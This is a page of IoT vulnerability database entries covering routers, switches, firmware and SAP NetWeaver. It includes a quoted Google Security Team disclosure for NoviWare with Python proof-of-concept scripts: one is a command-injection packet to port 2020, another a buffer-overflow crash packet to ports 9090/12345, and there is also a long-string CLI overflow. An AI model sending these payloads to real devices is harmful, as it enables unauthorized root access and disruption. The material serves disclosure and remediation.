VARIoT IoT vulnerabilities database


VAR-201709-0015 CVE-2016-10405 D-Link DIR-600L Session fixation vulnerability in router firmware CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
Session fixation vulnerability in D-Link DIR-600L routers (rev. Ax) with firmware before FW1.17.B01 allows remote attackers to hijack web sessions via unspecified vectors. The D-Link DIR-600L router firmware contains a session fixation vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). D-Link DIR-600L is a cloud router product from D-Link.
VAR-201708-1098 CVE-2017-12853 RealTime RWR-3G-100 Router Cross-Site Request Forgery Vulnerability CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
The RealTime RWR-3G-100 Router firmware version Ver1.0.56 is affected by CSRF, an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. RealTime RWR-3G-100 Router firmware contains a cross-site request forgery vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). RealTime RWR-3G-100 Router is a router from RealTimeSystem of India. A cross-site request forgery vulnerability exists in RealTime RWR-3G-100 Router using firmware version 1.0.56. This vulnerability can be exploited by remote attackers to force end users to perform unintended operations.
VAR-201708-1639 No CVE XSS vulnerability exists in NETGEAR FS726Tv2 Netware background CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
FS726T is a classic intelligent switch from NETGEAR. There is an XSS vulnerability in the management backend of NETGEAR FS726Tv2. An attacker can use this vulnerability to pop up a message in the login box to modify it.
VAR-201710-1106 CVE-2017-12822 plural Gemalto Product Sentinel LDK RTE Firmware access control vulnerability CVSS V2: 7.5
CVSS V3: 9.9
Severity: CRITICAL
Remote enabling and disabling admin interface in Gemalto's HASP SRM, Sentinel HASP and Sentinel LDK products prior to Sentinel LDK RTE version 7.55 leads to new attack vectors. Gemalto Sentinel License Manager is prone to the following security vulnerabilities: 1. Multiple stack-based buffer-overflow vulnerabilities. 2. Multiple heap-based buffer-overflow vulnerabilities. 3. A security bypass vulnerability. 4. A denial-of-service vulnerability. Attackers can exploit these issues to execute arbitrary code in the context of the user running the affected application or perform unauthorized actions. Failed exploit attempts will likely cause a denial-of-service condition. Sentinel LDK is a license management tool. A remote attacker could exploit this vulnerability to execute code
VAR-201710-1104 CVE-2017-12820 plural Gemalto Product Sentinel LDK RTE Firmware buffer error vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
Arbitrary memory read from controlled memory pointer in Gemalto's HASP SRM, Sentinel HASP and Sentinel LDK products prior to Sentinel LDK RTE version 7.55 leads to remote denial of service. Gemalto Sentinel License Manager is prone to the following security vulnerabilities: 1. Multiple stack-based buffer-overflow vulnerabilities. 2. Multiple heap-based buffer-overflow vulnerabilities. 3. A security bypass vulnerability. 4. A denial-of-service vulnerability. Attackers can exploit these issues to execute arbitrary code in the context of the user running the affected application or perform unauthorized actions. Failed exploit attempts will likely cause a denial-of-service condition. Sentinel LDK is a license management tool
VAR-201710-1105 CVE-2017-12821 plural Gemalto Product Sentinel LDK RTE Firmware buffer error vulnerability CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
Memory corruption in Gemalto's HASP SRM, Sentinel HASP and Sentinel LDK products prior to Sentinel LDK RTE version 7.55 might cause remote code execution. Gemalto Sentinel License Manager is prone to the following security vulnerabilities: 1. Multiple stack-based buffer-overflow vulnerabilities. 2. Multiple heap-based buffer-overflow vulnerabilities. 3. A security bypass vulnerability. 4. A denial-of-service vulnerability. Attackers can exploit these issues to execute arbitrary code in the context of the user running the affected application or perform unauthorized actions. Failed exploit attempts will likely cause a denial-of-service condition. Sentinel LDK is a license management tool
VAR-201708-1146 CVE-2017-12786 NoviWare Buffer error vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data. NoviWare contains a buffer error vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). NoviFlow NoviWare and NoviSwitch devices are products of NoviFlow Canada. NoviSwitch devices are a series of switch devices. NoviWare is the switch software used in them. A stack buffer overflow vulnerability exists in the network interfaces of the cliengine and noviengine services in NoviFlow NoviWare NW400.2.6 and earlier versions, as deployed on NoviSwitch devices. A remote attacker could exploit the vulnerability to execute code with root privileges.

NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities

Introduction
==========
NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant switch software developed by NoviFlow and available for license to network equipment manufacturers. Multiple vulnerabilities were identified in the NoviWare software deployed on NoviSwitch devices.

CVEs
=====
* CVE-2017-12784: remote code execution in novi_process_manager_daemon
  Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
* CVE-2017-12785: cli breakout in novish
  Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)
* CVE-2017-12786: remote code execution in noviengine and cliengine
  Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)

Affected versions
==============
NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version is deployed

Author
======
François Goichon - Google Security Team

CVE-2017-12784
==============
Remote code execution in novi_process_manager_daemon

Summary
-------------
The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device.
- A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service
- This network service is prone to command injection and a stack-based buffer overflow

Reproduction
------------------
If TCP port 2020 is accepting connections from the network, the following python script can be used to ping yourself on vulnerable versions :
---
from struct import pack
import socket

s = socket.socket()
s.connect((<switch host>, 2020))

payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00"
s.sendall(pack("<II", 1, len(payload)+8))
s.sendall(payload)
s.close()
---
On vulnerable versions, the appliance will perform an ICMP request to the specified IP, which can be observed in network logs.

Remediation
-----------------
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

CVE-2017-12785
==============
Cli breakout in novish

Summary
-------------
The NoviWare switching software distribution is prone to a buffer overflow and a command injection, allowing authenticated, low-privileged users to break out of the CLI and execute commands as root.

Reproduction
------------------
Log in to the appliance via SSH and run the following command from the CLI:
--
noviswitch# show log cli username AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
--
If the appliance is vulnerable, the cli crashes and the session ends.

Remediation
-----------------
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

- A flaw when applying ACL changes requested from the CLI could expose noviengine and cliengine network services
- These network services are prone to a stack-based buffer overflow when unpacking serialized values.

Reproduction
------------------
If TCP ports 9090 or 12345 are accepting connections from the network, the following python script can be used to cause a crash on vulnerable versions :
---
from struct import pack
import socket

s = socket.socket()
s.connect((<switch host>, <9090 or 12345>))

payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)])
payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload
s.sendall(payload)
s.read(1)
s.close()
---
A watchdog should restart the service if it has crashed.

Remediation
-----------------
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

Disclosure timeline
===============
2017/05/11 - Report sent to NoviFlow
2017/05/26 - Bugs acknowledged and remediation timeline confirmed
2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities
2017/08/09 - CVE requests
2017/08/16 - Public disclosure
VAR-201708-1147 CVE-2017-12787 NoviWare Buffer error vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow. NoviWare contains a buffer error vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). NoviFlow NoviWare and NoviSwitch devices are products of NoviFlow Canada. NoviSwitch devices are a series of switch devices. NoviWare is the switch software used in them. NoviFlow NoviWare NW400.2.6 and previous versions, and NoviSwitch devices, have a security vulnerability in the network interface of novi_process_manager_daemon. A remote attacker could exploit the vulnerability to execute code with root privileges.
VAR-201708-1145 CVE-2017-12785 NoviWare Buffer error vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the "show log cli" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection. NoviWare contains a buffer error vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS).
VAR-201708-1427 CVE-2017-9556 Synology Video Station Vulnerable to cross-site scripting CVSS V2: 3.5
CVSS V3: 5.4
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in Video Metadata Editor in Synology Video Station before 2.3.0-1435 allows remote authenticated attackers to inject arbitrary web script or HTML via the title parameter. Synology Video Station contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. Synology Video Station is a video manager from Synology. Video Metadata Editor is one of its video metadata editors.
VAR-201708-1647 No CVE D-Link DIR Series Router Authentication Information Disclosure Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The DIR series is a series of cloud router products from D-Link. The D-Link DIR series routers have a remote information bypass vulnerability that triggers global variables when an administrator logs in to the device. An attacker can therefore use such a global variable to bypass security checks, read arbitrary files and obtain sensitive information such as administrator account passwords.
VAR-201708-1646 No CVE D-Link DIR Series Router Remote Command Execution Vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
The DIR series is a series of cloud router products from D-Link. A remote command execution vulnerability exists in D-Link DIR series routers. An attacker can obtain the router's backend login credentials and execute arbitrary code through the router's public network portal.
VAR-201708-0549 CVE-2017-3756 plural Lenovo ThinkPad Vulnerabilities related to authorization, authority, and access control in products CVSS V2: 7.2
CVSS V3: 7.8
Severity: HIGH
A privilege escalation vulnerability was identified in Lenovo Active Protection System for ThinkPad systems versions earlier than 1.82.0.17. An attacker with local privileges could execute code with administrative privileges via an unquoted service path. Multiple Lenovo ThinkPad products contain vulnerabilities related to authorization, permissions, and access control. Information may be obtained or altered, and service operation may be disrupted (DoS). Lenovo Active Protection System is prone to a local privilege-escalation vulnerability. Lenovo ThinkPad for Windows is a Windows-based portable computer from Lenovo of China. Active Protection System is an autonomous feature designed to protect hard drives from damage caused by strong physical shocks and vibrations.
VAR-201708-0959 CVE-2017-5694 Intel Solid-State Drive Professional Data processing vulnerability in some firmware CVSS V2: 4.9
CVSS V3: 4.6
Severity: MEDIUM
Data corruption vulnerability in firmware in Intel Solid-State Drive Professional PSF104P, PSF109P allows local users to cause a denial of service via unspecified vectors. Intel Solid-State Drive Professional is a solid state drive from Intel Corporation of the United States. There is a security vulnerability in the firmware in the Intel Solid-State Drive Professional PSF104P and PSF109P versions.
VAR-201708-0960 CVE-2017-5695 plural Intel Input validation vulnerability in firmware CVSS V2: 2.1
CVSS V3: 4.6
Severity: MEDIUM
Data corruption vulnerability in firmware in Intel Solid-State Drive Consumer, Professional, Embedded, Data Center affected firmware versions LSBG200, LSF031C, LSF036C, LBF010C, LSBG100, LSF031C, LSF036C, LBF010C, LSF031P, LSF036P, LBF010P, LSF031P, LSF036P, LBF010P, LSMG200, LSF031E, LSF036E, LSMG100, LSF031E, LSF036E, LSDG200, LSF031D, LSF036D allows local users to cause a denial of service via unspecified vectors. The firmware of multiple Intel products contains an input validation vulnerability. A denial of service (DoS) may result. Intel SSD 540s Series and others are different series of SSD products from Intel Corporation of the United States. There are security vulnerabilities in several Intel products.
VAR-201708-1179 CVE-2017-12754 plural ASUS For devices Asuswrt-Merlin Firmware and ASUS Firmware buffer error vulnerability CVSS V2: 6.5
CVSS V3: 8.8
Severity: HIGH
Stack buffer overflow in httpd in Asuswrt-Merlin firmware 380.67_0RT-AC5300 and earlier for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code on the router by sending a crafted http GET request packet that includes a long delete_offline_client parameter in the url. Asuswrt-Merlin firmware and ASUS firmware for multiple ASUS devices contain a buffer error vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). ASUS RT-AC5300 and others are wireless routers from ASUS. ASUS Asuswrt-Merlin is the firmware running on them. Httpd is one of the embedded http servers. A stack buffer overflow vulnerability exists in httpd in Asuswrt-Merlin 380.67_0RT-AC5300 and previous versions in several ASUS products.
VAR-201801-0231 CVE-2017-5170 Moxa SoftNVR-IA Live Viewer DLL Local arbitrary code execution vulnerability CVSS V2: 6.5
CVSS V3: 7.2
Severity: HIGH
An Uncontrolled Search Path Element issue was discovered in Moxa SoftNVR-IA Live Viewer, Version 3.30.3122 and prior versions. An uncontrolled search path element (DLL Hijacking) vulnerability has been identified. To exploit this vulnerability, an attacker could rename a malicious DLL to meet the criteria of the application, and the application would not verify that the DLL is correct. The attacker needs to have administrative access to the default install location in order to plant the insecure DLL. Once loaded by the application, the DLL could run malicious code at the privilege level of the application. Moxa SoftNVR-IA Live Viewer is a video surveillance software developed by Moxa for industrial automation systems. A local arbitrary code execution vulnerability via DLL exists in Moxa SoftNVR-IA Live Viewer 3.30.3122 and earlier. This vulnerability stems from a program failing to properly filter user-submitted input.
VAR-201708-1674 No CVE SAP NetWeaver Unspecified SQL Injection Vulnerability CVSS V2: -
CVSS V3: -
Severity: -
SAP NetWeaver is prone to an unspecified SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
VAR-201708-1677 No CVE SAP NetWeaver Business Unspecified Cross Site Scripting Vulnerability CVSS V2: -
CVSS V3: -
Severity: -
SAP NetWeaver is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
VAR-201708-1668 No CVE SAP NetWeaver K.M. Web Page Composer URI Redirection Vulnerability CVSS V2: -
CVSS V3: -
Severity: -
SAP NetWeaver is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.